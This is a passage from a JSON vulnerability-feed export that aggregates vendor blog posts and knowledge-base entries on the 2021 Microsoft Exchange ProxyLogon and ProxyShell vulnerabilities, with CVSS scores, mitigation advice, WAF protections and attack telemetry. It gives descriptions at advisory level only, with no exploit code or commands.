Team](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) published today.\n\n#### VMware Carbon Black Cloud Endpoint And Workload Protection Best Practices\n\n**Patch** \nPrioritize installing the recommended patches in your Microsoft Exchange environment as these vulnerabilities enable unauthenticated remote code execution and file-writes. If you are leveraging VMware Carbon Black Workload, you can quickly identify what assets have these critical exploitable CVE\u2019s within in your vCenter or within the VMware Carbon Black Cloud platform. In the platform, risk is prioritized based on how exploitable each CVE is.\n\n\n\n\n\n**Network** \nOur TAU also recommends implementing egress network ACLs for all externally facing web services in your environment.\n\n**Windows Operating Systems** \nVMware Carbon Black customers running the 3.6 sensor versions are protected out of the box without any need to configure rules relating to the post-compromise credential theft techniques disclosed. The latest versions of the VMware Carbon Black Cloud sensors will also detect and block suspect PowerShell usage typically associated with post-compromise behaviors using the AMSI detection capabilities.\n\nVMware Carbon Black Cloud customers utilizing NGAV and EDR detection analytics will generically identify and alert on behaviors associated with Web Shell activity, Reverse Shells, and unusual command interpreter behaviors.\n\n\n\nVMware TAU also recommends customers to enable the following Anti-Malware engine settings within the VMware Carbon Black Cloud console to ensure the best possible protection:\n\n * Delay executes for cloud scan\n * Submit unknown binaries for analysis\n\n_In order to take full advantage of the most up-to-date threat intelligence detection and prevention rules, customers must be running 3.6 or greater VMware Carbon Black Cloud sensor versions and running NGAV._\n\nThe post [TAU Threat Advisory: Microsoft Exchange Servers Targeted with Four Zero-day Exploits](<https://www.carbonblack.com/blog/tau-threat-advisory-microsoft-exchange-servers-targeted-with-four-zero-day-exploits/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T21:05:13", "type": "carbonblack", "title": "TAU Threat Advisory: Microsoft Exchange Servers Targeted with Four Zero-day Exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-08T21:05:13", "id": "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "href": "https://www.carbonblack.com/blog/tau-threat-advisory-microsoft-exchange-servers-targeted-with-four-zero-day-exploits/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2021-03-15T22:39:29", "description": "Co-authored by Ryan Barnett.\n\n### AppSec Protections for Microsoft Exchange CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065\n\nOn March 2, 2021, the Microsoft Security Response Center alerted its customers to [several critical security updates](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to Microsoft Exchange Server, addressing vulnerabilities currently under attack. \n\nThe United States Computer Emergency Readiness Team Cybersecurity and Infrastructure Security Agency also issued an [alert with recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa21-062a>) on how to mitigate the vulnerabilities. \n\n * [CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>) allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information.\n * [CVE-2021-26857](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26857>), [CVE-2021-26858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858>), and [CVE-2021-27065](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27065>) allow for remote code execution.\n * CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server. \n\n * CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server\n * To locate a possible compromise of these CVEs, we encourage you to read the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\n### How Akamai Can Help \n\n\nCustomers that use Akamai Web Application Firewall solutions, Kona Site Defender and Web Application Protector, with the Automated Attack Groups engine have received an automatic update for protection. Akamai recommends that customers using Automated Attack Groups set all their attack groups, but specifically the Web Platform Attack Group, to Deny to prevent these exploitation attempts.\n\nKona Site Defender customers using Kona Rule Set (KRS) should update their profile and enable newly released rules ID 3000083 and 3000084 in the Total Request Score (Inbound) attack group in order to protect against attempts to exploit the following CVEs:\n\n * CVE-2021-26855, which is the SSRF vulnerability\n * CVE-2021-27065, which is being used to upload webshells\n\n**Akamai recommends that either the attack group or the individual KRS rules be put into Deny mode to protect against attempts to exploit these vulnerabilities.**\n\nAkamai's research and intelligence teams observed that attackers have been quick to automate their target identification and exploitation attempts. A variety of existing controls in Akamai's security portfolio are designed to detect these attempts:\n\n 1. Web Application Firewall \\-- Rate Controls, TOR IP Blocklist, and Penalty Box are all also detecting and blocking this scanning traffic\n 2. Client Reputation \\-- the \"Web Scanner\" and \"Web Attacker\" categories are identifying many attackers searching for vulnerable targets\n 3. Bot Management \\-- controls detect the incoming traffic to be automated or from anonymous proxies\n\nIf you have any questions, please reach out to Akamai Support Services or your account team.\n\n## Global Attack Intelligence\n\nOver the last 48 hours on our global platform we have observed:\n\n * 290,000 unique attempts to scan and/or exploit these vulnerabilities\n * 952 unique IPs involved in these attempts \n * 731 of these unique IPs were identified by Akamai Client Reputation threat intelligence as known web scanners or web attackers with a median score of 9.6 out of 10\n * 23,910 unique hosts targeted\n * 80% of attack activity targeted against Commerce, High-Tech, Financial Services, and Manufacturing verticals\n * 90% of all attack attempts targeted against organizations in the United States, Austria, India, Canada, Germany, France and the United Kingdom\n * Assetnote and Qualys were the top two known scanners\n\n[  ](<https://blogs.akamai.com/Microsoftblog2.png>) **Figure**: Attack sources; the top number represents the number of requests and the bottom number represents the number of IPs\n\n## Conclusion and Recommended Steps\n\nWe've confirmed active attempts of exploitation of Microsoft Exchange/Outlook Web Access zero-day vulnerabilities.\n\nSuccessful exploitation allows an unauthenticated attacker to execute arbitrary code and install webshells on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system.\n\nMitigation and remediation can be achieved by following these steps:\n\n 1. Akamai customers that have Exchange/Outlook Web Access protected by either Kona Site Defender using the Automated Attack Groups rule set or the Web Application Protector product have already received an automatic update to the Platform Attacks Group. Kona Site Defender customers that are using the Kona Rule Set, however, need to take steps to activate the new rules to receive protection.\n 2. Customers should also deploy updates to affected Exchange Servers as recommended by Microsoft and enable the Akamai protections as recommended above.\n 3. Customers should investigate for exploitation or indicators of persistence.\n 4. Customers should remediate any identified exploitation or persistence and investigate their environment for indicators of lateral movement or further compromise.\n\nCompanies should consider implementing Zero Trust Network Access (ZTNA) to be able to weather software vulnerabilities like these. Unlike the traditional \"verify, then trust\" model -- which means if someone has the correct user credentials, they are admitted to whichever site, app, or device they are requesting -- ZTNA dictates that users and devices are never trusted and can only access applications and data after passing a secure authentication and authorization process that does not solely rely on user credentials. You can read more about how ZTNA can protect corporate resources in the context of these Microsoft Exchange vulnerabilities in the blog post, [Microsoft Exchange and Verkada Hacks: Isolate Your Apps & APIs from the Internet Cesspool: Isolate Your Apps and APIs from the Internet Cesspool](<https://blogs.akamai.com/2021/03/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool.html>).\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T22:30:00", "type": "akamaiblog", "title": "How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-15T21:41:53", "id": "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/q7n8HyPxlM4/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-24T18:27:13", "description": "The past month has been a very dynamic time in the world of security for hackers and threat researchers, but it has been an extended nightmare for CSOs responsible for securing their enterprise networks. \n\nFor starters, on-premise Microsoft Exchange servers were attacked in droves after a set of zero-day vulnerabilities were discovered, resulting in [widespread infiltration of hundreds of thousands of organizations](<https://www.zdnet.com/article/microsoft-exchange-server-attacks-theyre-being-hacked-faster-than-we-can-count-says-security-company/>). These vulnerabilities allow malicious actors to remotely control machines, read emails, and gain access to internal corporate assets. To illustrate how widespread this attack was, in the two days following the disclosure, Akamai observed [over 290,000 unique attempts to scan and/or exploit these vulnerabilities on our global platform](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>). Microsoft rapidly issued patches for the vulnerability, but the breadth and scale of the breaches won't be truly known for some time, with some enterprises experiencing advanced persistent threats as a result of the exploit.\n\nAs if this wasn't already bad enough, customers of IT security company F5, which has included almost all of the world's Fortune 50 companies, found themselves rocked with [yet another set of highly severe application vulnerabilities](<https://thehackernews.com/2021/03/latest-f5-big-ip-bug-under-active.html>), this time for F5's BIG-IP family of load balancing and security products. These vulnerabilities allow for remote execution of system commands, potentially allowing complete control of the server, interception, and redirection of web traffic, decryption of traffic destined for web servers, and infiltration as a jump host to reach other areas of the network. The National Vulnerability Database ranked these vulnerabilities as critical, some with a [CVSS rating](<https://nvd.nist.gov/vuln-metrics/cvss>) as high as 9.9 out of 10.\n\nBoth of these vulnerabilities, which are actively being exploited by real-world attackers, involve robust highly-utilized systems that have authentication built directly in. So how did this happen?\n\n## Application Authentication\n\nIn both the Microsoft Exchange and F5 BIG-IP products, authentication is required before privileged activities can be performed. While this is an important and required facet of security, many individuals falsely assume that this authentication, which is applied at the application level, provides ample protection.\n\nThis is a misconception, however. If an end user can reach an application such that it prompts them to enter credentials, they have already caused code to execute. This is true regardless of the authentication method or prompt. It does not matter whether the application redirects an end user to an IdP or asks for a username and password directly; the very act of asking for credentials means the application was contacted over the network, code was executed, and a response was tendered to the end user.\n\nAnd this is where the problem lies. Applications are written by human beings, and human beings make mistakes. This is at the heart of the vulnerabilities within Microsoft Exchange and F5 BIG-IP. In both cases, there were incorrect checks against the authentication, which allowed payloads to bypass valid logins and result in exploitation. In other words, the very fact that the systems are reachable is enough to exploit them.\n\nIf you can't trust that the application is implemented perfectly, then what can you do?\n\n## Network Authentication\n\nThe right answer to this problem has been known for quite some time: tie the authentication to not only the application but to the network as well. Zero Trust Network Access is one such method to do this. In a Zero Trust environment, a proxy sits between an enterprise's internal network assets and the users who wish to access them. Basic network communication cannot be established until the end user's identity has been established.\n\nThe authenticators that can be used in a Zero Trust environment tend to be far richer than a VPN, including user identity, groups, device posture, multi-factor authentication (MFA), time of day, location, user and entity behavior analytics (UEBA), client reputation, and more. Only once the proxy has validated the authentication and determined the user is authorized for access does it allow packets to actually reach the application, where it too can then perform additional authentication and authorization checks.\n\nThis has a massive impact on reducing the threat surface of the attacks. In the case of Microsoft Exchange and F5 BIG-IP, it means the vulnerabilities can only be exercised by insiders as opposed to anyone in the world that can reach the machine. This is a drastic improvement.\n\nBut is there anything else we can do?\n\n## It's All About Who and What\n\nReducing the threat surface from the entire world to insiders only is arguably the most impactful step that an enterprise can take toward protecting itself from the above style of vulnerabilities. However, this does not completely eliminate the threat. It simply restricts who can exercise it.\n\nThe problem is that insiders can also be malicious, either directly, or much more often, indirectly through malware installed on their machine or theft of credentials and forged identities by malicious actors. To further protect oneself, a web application firewall (WAF) can help eliminate the risk of what is being sent. Once signatures of the attack are known, a WAF stops even malicious insiders from delivering exploit payloads, further strengthening an enterprise's security posture.\n\nOne may wonder why it's worth having a WAF when patches will eventually eliminate the vulnerability altogether. The answer is in the term eventually. Enterprises can be achingly slow to apply critical patches, having experienced crushing downtimes when poorly written patches have caused outages. In other environments, an enterprise may not even have a full inventory of all of their assets that require patching.\n\nIn these cases, providing a WAF can safely extend the time to patch. Administrators can test the patch, create a staging environment, and deploy over a timeline that meets the business needs, assured that they are safe from exploitation as the WAF is filtering all communications to the vulnerable services.\n\n## A Call to Action\n\nFortunately, Akamai provides a comprehensive suite of products, services, and capabilities that can be used to make your organization safer and more secure.\n\nFirst, our [Akamai Enterprise Application Access](<https://www.akamai.com/us/en/products/security/enterprise-application-access.jsp>) product is a complete Zero Trust Access solution that allows for the closure of all inbound firewall ports and the removal of DMZ applications. Through our set of proxies and rich authentication and authorization primitives, authorized users and devices have full access to only the set of internal applications they need, without additional access to any other assets on the network.\n\nFor employees, these heightened security checks do not mean additional steps or inconvenience when accessing the IT resources they need. In fact, things become simpler and more secure. Native integration with Active Directory, Azure AD, SAML, OIDC, OAuth, and more mean your enterprise can gain the noted security benefits without any changes to your existing application authentication flows.\n\nAdditionally, the inclusion of our [Akamai MFA](<https://www.akamai.com/us/en/products/security/akamai-mfa.jsp>) product extends the noted protections through the use of patent-pending phish-proof multi-factor authentication, allowing end users to use their smartphones to leverage state-of-the-art FIDO2 authentication, the strongest standards-based method currently available. With other solutions, this still requires the use of physical security keys, which not only come at a cost but are also typically perceived as inconvenient and not very popular among employees.\n\nFinally, Akamai's Kona WAF is designed to block not only the full suite of standard attacks web applications receive but also the specific attacks on unpatched Exchange instances noted earlier; for details, please read [How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>).\n\nAkamai can help you [start your Zero Trust security journey](<https://www.akamai.com/us/en/solutions/security/zero-trust-security-model.jsp#zero-trust-security-journey>) and move to a least-privilege application access model. [Contact us](<https://www.akamai.com/us/en/contact-us/>) for more information on how we can help you mitigate similar security incidents!\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-24T14:00:00", "type": "akamaiblog", "title": "Authentication: Lessons Learned from Microsoft Exchange and F5 BIG-IP Hacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-2706"], "modified": "2021-03-24T17:05:35", "id": "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/iGDirCGcXcg/authentication-lessons-learned-from-microsoft-exchange-and-f5-big-ip-hacks.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-15T22:39:29", "description": "It's been an interesting start to March in terms of public security incidents. \n\nThis month kicked off with multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. And, as if that wasn't enough, that attack was quickly followed by the news that a hacktivist \"collective\" calling itself APT-69420 claims to have breached the internal systems of the Silicon Valley firm Verkada. That particular breach has garnered widespread press coverage as the group claims to have gained access to live video feeds from more than 150,000 surveillance cameras. \n\nFor me, both of these incidents -- and the responses from the various impacted firms -- brought to mind what we as an industry have been talking about for a while: [why moats and castles belong in the past](<https://blogs.akamai.com/2017/04/why-moats-and-castles-belong-in-the-past.html>).\n\nFrom my perspective, these incidents represent yet another reason why moving to a Zero Trust security model that leverages a cloud-first approach is the future of security for the majority of us. \n\nWhy? It's pretty simple.\n\nLet's look at the Exchange remote code execution vulnerability first. \n\nMicrosoft strongly urged customers to patch on-premises systems immediately. But, as we all know, patching systems isn't always as easy or quick as it sounds, especially for IT teams that are generally overwhelmed and understaffed. As one would expect, [multiple actors continue to take advantage of unpatched systems to attack organizations with vulnerable on-premises Exchange Servers](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\n[](<https://blogs.akamai.com/Miscosoft%20Image%201.png>)\n\nAt Akamai, our threat research team rolled out signatures for our web application firewall (WAF), which can stop potentially malicious payloads targeted at vulnerable Microsoft Exchange servers. In other words, Akamai's WAF can block the malicious payload destined for a potentially unpatched system. Clearly, this does not replace patching in the long run, but can buy precious time for IT teams. \n\nIf you are interested in learning more about Akamai's WAF-related Microsoft Exchange server zero-day mitigations, read [How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>)\n\nThese incidents also raise the larger question: What should and shouldn't be exposed to the public internet?\n\nThat question takes me back to an appropriately titled Gartner report from 2016 called [\"It's Time to Isolate Your Services From the Internet Cesspool\"](<https://www.gartner.com/en/documents/3463617/it-s-time-to-isolate-your-services-from-the-internet-ces>) that gives some pretty clear guidance on that front. The answer is fairly simple: only expose to the internet what you absolutely have to; and for those services, make sure the appropriate security controls are in place.\n\nThat brings me to the second piece of major news, the Verkada hack. \n\nAs with most breaches, there are still a lot of open questions and conjecture, but what has emerged suggests that [exposing a Jenkins server on the public internet is quite risky](<https://arstechnica.com/information-technology/2021/03/hackers-access-security-cameras-inside-cloudflare-jails-and-hospitals/>). Combine that with the well-understood tactics, techniques, and procedures of most threat actors to obtain system access and use that initial access to pivot to other resources on the network, and you have a recipe for even more risk.\n\nEither way, in both of these cases restricting access to a vulnerable Exchange or Jenkins server through some form of intelligent access control can stop threat actors from reaching resources directly. [I am partial to Zero Trust Network Access](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-2020-market-guide-for-zero-trust-network-access.jsp>) (ZTNA) approaches that limit who can send malicious payloads targeted at the vulnerable systems. Obviously, this doesn't remove the vulnerability, but restricting access to a potentially vulnerable server through ZTNA can stop any malicious actors from reaching it directly. \n\n[](<https://blogs.akamai.com/Microsoft%20Image2.png>)\n\nIf external actors can't reach a vulnerable system directly, they need to redirect their efforts to reaching it through impersonating an actual end user, which becomes increasingly difficult with the use of contextual, adaptive, and identity aware access controls, such as ZTNA reinforced with FIDO2-compliant multi-factor authentication. Combine those access controls with an inline WAF and a positive picture emerges. Control who has access and inspect traffic flows for anything malicious, even for users who have control.\n\nThe bottom line: Both of these incidents highlight the need to [move to a zero trust-based security model](<https://www.akamai.com/us/en/solutions/security/zero-trust-security-model.jsp>). \n\nIf you are interested in learning more, I suggest you start with [Akamai Secure Access Service Edge](<https://www.akamai.com/sase>) and our [Enterprise Defender solution](<https://www.akamai.com/us/en/multimedia/documents/product-brief/enterprise-defender-product-brief.pdf>), which combines ZTNA, Secure Web Gateway, Web Application Firewall, and application acceleration as one simple-to-consume security service delivered at the Akamai edge.\n\nIsn't it time to effectively isolate apps and APIs from the internet? \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T22:15:00", "type": "akamaiblog", "title": "Microsoft Exchange and Verkada Hacks: Isolate Your Apps and APIs from the Internet Cesspool", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-2706"], "modified": "2021-03-15T21:50:30", "id": "AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/qbi2avdhkGQ/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2021-03-10T14:27:54", "description": "Microsoft released patches for four vulnerabilities in Exchange Server on March 2, disclosing that these vulnerabilities were being exploited by a previously unknown threat actor, referred to as HAFNIUM. The vulnerabilities in question \u2014 CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 \u2014 affect Microsoft Exchange Server 2019, 2016, 2013 and the out-of-support Microsoft Exchange Server 2010. The patches for these vulnerabilities should be applied as soon as possible. Microsoft... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {}, "published": "2021-03-08T10:18:43", "type": "talosblog", "title": "Threat Advisory: HAFNIUM and Microsoft Exchange zero-day", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-08T10:18:43", "id": "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/YIQrIoqvPyk/threat-advisory-hafnium-and-microsoft.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:43:28", "description": "Microsoft disclosed four actively exploited zero-day vulnerabilities being used to attack on-premises versions of Microsoft Exchange Server. The vulnerabilities identified are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which affect Microsoft Exchange Server. Exchange Online is not affected.\n\nIn the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 03, 2021 4:10pm UTC reported:\n\nMicrosoft [released details](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on an active state-sponsored threat campaign (attributed to HAFNIUM) that is exploiting on-prem Exchange Server installations. Microsoft\u2019s observation was that these were limited, targeted attacks, but as of March 3, 2021, ongoing mass exploitation has been confirmed by multiple sources. More in the [Rapid7 analysis](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=assessment#rapid7-analysis>) tab.\n\n**NinjaOperator** at June 29, 2021 9:51pm UTC reported:\n\nMicrosoft [released details](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on an active state-sponsored threat campaign (attributed to HAFNIUM) that is exploiting on-prem Exchange Server installations. Microsoft\u2019s observation was that these were limited, targeted attacks, but as of March 3, 2021, ongoing mass exploitation has been confirmed by multiple sources. More in the [Rapid7 analysis](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=assessment#rapid7-analysis>) tab.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T00:00:00", "type": "attackerkb", "title": "Multiple Microsoft Exchange zero-day vulnerabilities - ProxyLogon Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-09T00:00:00", "id": "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "href": "https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---proxylogon-exploit-chain", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:52", "description": "ProxyShell is an exploit chain targeting on-premise installations of Microsoft Exchange Server. It was demonstrated by Orange Tsai at Pwn2Own in April 2021 and is comprised of three CVEs that, when chained, allow a remote unauthenticated attacker to execute arbitrary code on vulnerable targets. The three CVEs are CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.\n\nDetails are available in Orange Tsai\u2019s [Black Hat USA 2020 talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) and follow-on [blog series](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>). ProxyShell is being broadly exploited in the wild as of August 12, 2021.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at August 12, 2021 9:19pm UTC reported:\n\nCheck out the [Rapid7 analysis](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) for details on the exploit chain. Seems like a lot of the PoC implementations so far are using admin mailboxes, but I\u2019d imagine folks are going to start finding ways around that soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 